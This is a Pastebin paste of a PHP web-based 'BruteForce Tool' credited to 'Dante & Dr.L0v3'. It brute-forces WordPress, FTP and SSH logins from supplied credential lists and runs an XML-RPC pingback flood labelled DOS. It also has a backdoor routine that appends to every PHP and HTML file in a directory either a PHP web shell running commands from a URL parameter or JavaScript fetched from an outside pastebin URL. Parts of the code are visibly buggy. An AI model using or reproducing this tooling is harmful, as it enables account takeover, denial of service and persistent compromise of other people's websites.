Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <style type="text/css">
- textarea { resize: none; }
- </style>
- <body text='white' bgcolor='#000000'>
- <title>BruteForce</title>
- <p align='center' dir='ltr'><font face='Gigi' size='6'>*** BruteForce Tool ***</font></p>
- <form method='POST'>
- <center>
- <p dir='ltr'>
- <textarea rows="2" cols="40" name="ip"></textarea><br><br>
- <input type='submit' value='Start !!!' name='start'><br><br/>
- <input name="myradio" value="1" type="radio"> Wordpress</div>
- <input name="myradio" value="2" type="radio"> FTP</div>
- <input name="myradio" value="3" type="radio"> SSH</div>
- <input name="myradio" value="4" type="radio"> XMLRPC/DOS</div><br/><br/>
- <p align='center' dir='ltr'><font face='Gigi' size='5'>Backdoor</font></p>
- <input type='text' placeholder="Directory" name='dir'>
- <select name="case">
- <option value="js">JS Backdoor</option>
- <option value="php">PHP Backdoor</option>
- </select>
- <input type='submit' value='Upload' name='up'><br/><br/>
- <form method="post" enctype="multipart/form-data">
- <input type="file" id="inputfile" name="inputfile">
- <input type="submit" name="back" value="Click To Upload"><br/><br/>
- </form>
- <div style='float: left; margin-left: 10px; border: dashed 1px; background: black; color: white;'>
- <textarea cols='40' rows='21' name='username'>Username</textarea></div>
- <div style='float: right; margin-right: 10px; border: dashed 1px; background: black; color: white;'>
- <textarea cols='40' rows='21' name='password'>Password</textarea></div>
- <font face='Verdana' size='1'>[-] RESULT [-]</font>
- </form>
- <?php
- @set_time_limit(0);
- $ip = explode("
- ", $_POST['ip']);
- $username = explode("
- ", $_POST['username']); // Mass
- $password = explode("
- ", $_POST['password']);
- function encdir($dir, $code) {
- $files = array_diff(scandir($dir), array('.', '..'));
- foreach ($files as $filemine){
- if(is_dir($dir.'\\'.$filemine)){
- encdir($dir.'\\'.$filemine);
- }else{
- $a = stripos(basename($dir.'/'.$filemine), 'php');
- $b = stripos(basename($dir.'/'.$filemine), 'html');
- if ($a !== false || $b !== false) {
- file_put_contents($dir.'/'.$filemine, $code, FILE_APPEND);
- echo "<dir='ltr'><font face='Tahoma' size='2'><font color='#008000'><br/><br/>".$dir.'/'.$filemine.'<br/></font>';
- }
- }
- }
- }
- function bruteftp($connect, $ip, $user, $pass) {
- $connect = ftp_connect($ip) or die("Error");
- if (ftp_login($connect, $user, $pass)) {
- echo "<p dir='ltr'><font face='Tahoma' size='2'>Cracked :
- <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
- }
- }
- function xmlrpc($target, $url, $base){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
- curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/xml'));
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$target</string></value></param><param><value><string>$base</string></value></param></params></methodCall>");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- }
- $brute = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>";
- function bruteword($ip, $user, $pass){
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $ip.'/wp-login.php');
- curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($curl, CURLOPT_POST, true);
- curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$user&pwd=$pass&wp-submit=Login&redirect_to=$ip/wp-admin/&testcookie=1");
- $exec = curl_exec($curl);
- $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
- if($http == 302 && preg_match("//",$result) || eregi('upload.php',$brute) ) {
- echo "<br/><p dir='ltr'><font face='Tahoma' size='2'>Cracked :
- <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
- } else {
- echo "<br/><font color='red'>Failed</font><br>";
- }
- curl_close($curl);
- }
- function brutessh($ip, $user, $pass){
- $ssh = @ssh2_connect($ip, 22);
- $auth = @ssh2_auth_password($ssh, $user, $pass);
- if($auth){
- echo "<br/><p dir='ltr'><font face='Tahoma' size='2'>Cracked :
- <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
- }
- }
- if (isset($_POST['start'])) {
- switch ($_POST['myradio']){
- case 1:
- foreach ($ip as $host) {
- foreach ($username as $user) {
- foreach ($password as $pass) {
- bruteword($host, $user, $pass);
- }
- }
- }
- break;
- case 2:
- foreach ($ip as $host) {
- foreach ($username as $user) {
- foreach ($password as $pass) {
- bruteftp($connect, $host, $user, $pass);
- }
- }
- }
- break;
- case 3:
- foreach ($ip as $host) {
- foreach ($username as $user) {
- foreach ($password as $pass) {
- brutessh($ip, $user, $pass);
- }
- }
- }
- break;
- case 4:
- foreach ($ip as $host) {
- foreach ($username as $user) {
- foreach ($password as $pass) {
- xmlrpc($host, $user, $pass);
- }
- }
- }
- break;
- }
- }
- if(isset($_POST['back'])){
- if($_POST['case'] == 'js') {
- $code = file_get_contents('http://pastebin.com/raw/NrjQtBrn');
- encdir($_POST['dir'], $code);
- }elseif($_POST['case'] == 'php') {
- $shell = '<?php system($_GET["com"]); ?>';
- encdir($_POST['dir'], $shell);
- }
- }
- echo "<p><font face='Verdana' size='1'>
- +------------------------------------------------------------------------------------------------------------+</font></p>
- <p><font face='Verdana' size='1'>Rec0ded by : <a>Dante & Dr.L0v3</a></font></p>
- </form>";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement